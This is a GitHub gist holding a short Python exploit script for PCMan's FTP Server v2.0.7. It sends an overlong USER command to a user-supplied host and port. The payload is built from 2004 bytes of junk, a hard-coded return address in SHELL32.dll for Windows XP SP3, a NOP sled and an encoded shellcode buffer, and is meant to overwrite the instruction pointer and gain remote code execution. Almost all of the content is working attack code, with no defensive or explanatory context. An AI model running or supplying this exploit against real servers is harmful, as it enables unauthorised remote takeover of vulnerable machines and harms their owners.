Created
January 4, 2017 14:53
-
-
Save 0vulns/2736594517fe1c7bcde78159c703c7b3 to your computer and use it in GitHub Desktop.
Final PCMan's FTP Server v2.0.7 Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Final PCMan's FTP Server v2.0.7 Exploit | |
import sys, socket, time | |
host = sys.argv[1] # Recieve IP from user | |
port = int(sys.argv[2]) # Recieve Port from user | |
buf = "" | |
buf += "\xda\xdf\xd9\x74\x24\xf4\x5b\xbe\xba\x06\x35\xe1\x31" | |
buf += "\xc9\xb1\x31\x83\xc3\x04\x31\x73\x14\x03\x73\xae\xe4" | |
buf += "\xc0\x1d\x26\x6a\x2a\xde\xb6\x0b\xa2\x3b\x87\x0b\xd0" | |
buf += "\x48\xb7\xbb\x92\x1d\x3b\x37\xf6\xb5\xc8\x35\xdf\xba" | |
buf += "\x79\xf3\x39\xf4\x7a\xa8\x7a\x97\xf8\xb3\xae\x77\xc1" | |
buf += "\x7b\xa3\x76\x06\x61\x4e\x2a\xdf\xed\xfd\xdb\x54\xbb" | |
buf += "\x3d\x57\x26\x2d\x46\x84\xfe\x4c\x67\x1b\x75\x17\xa7" | |
buf += "\x9d\x5a\x23\xee\x85\xbf\x0e\xb8\x3e\x0b\xe4\x3b\x97" | |
buf += "\x42\x05\x97\xd6\x6b\xf4\xe9\x1f\x4b\xe7\x9f\x69\xa8" | |
buf += "\x9a\xa7\xad\xd3\x40\x2d\x36\x73\x02\x95\x92\x82\xc7" | |
buf += "\x40\x50\x88\xac\x07\x3e\x8c\x33\xcb\x34\xa8\xb8\xea" | |
buf += "\x9a\x39\xfa\xc8\x3e\x62\x58\x70\x66\xce\x0f\x8d\x78" | |
buf += "\xb1\xf0\x2b\xf2\x5f\xe4\x41\x59\x35\xfb\xd4\xe7\x7b" | |
buf += "\xfb\xe6\xe7\x2b\x94\xd7\x6c\xa4\xe3\xe7\xa6\x81\x1c" | |
buf += "\xa2\xeb\xa3\xb4\x6b\x7e\xf6\xd8\x8b\x54\x34\xe5\x0f" | |
buf += "\x5d\xc4\x12\x0f\x14\xc1\x5f\x97\xc4\xbb\xf0\x72\xeb" | |
buf += "\x68\xf0\x56\x88\xef\x62\x3a\x61\x8a\x02\xd9\x7d" | |
# Return Address 0x7C9D30D7 in SHELL32.dll (Win XP SP3) | |
ret = '\xD7\x30\x9D\x7C' # Packed in little endian | |
# NOP Padding | |
nop = '\x90'*20 | |
# EIP Writing Pattern | |
pattern = "A"*2004 + ret + nop + buf # Our exploit together. Junk -> Return Address -> NOPS -> Shellcode | |
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket | |
client.connect((host, port)) # Connect to user supplied port and IP address | |
client.recv(1024) # Recieve FTP Banner | |
client.send("USER " + pattern) # Send the user command with a variable length name | |
client.close() # Close the Connection |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment